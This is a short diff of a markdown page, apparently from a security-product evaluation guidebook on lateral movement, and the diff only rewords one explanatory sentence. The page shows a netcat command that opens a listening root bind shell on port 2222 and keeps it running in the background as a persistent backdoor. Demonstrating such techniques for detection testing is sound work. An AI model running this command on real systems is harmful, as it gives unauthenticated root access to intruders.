spyderbat/eval/guidebook/src/lateral/outside.md

 which nc
 ```

-Then, we can start a listening port set up to connect us to a root shell, and disown the process so it stays around when we leave.
+We can start a listening port configured to connect us to a root shell, then disown the process so it stays around when we leave.

 ```sh
 sudo nc -l -p 2222 -e "/bin/bash" &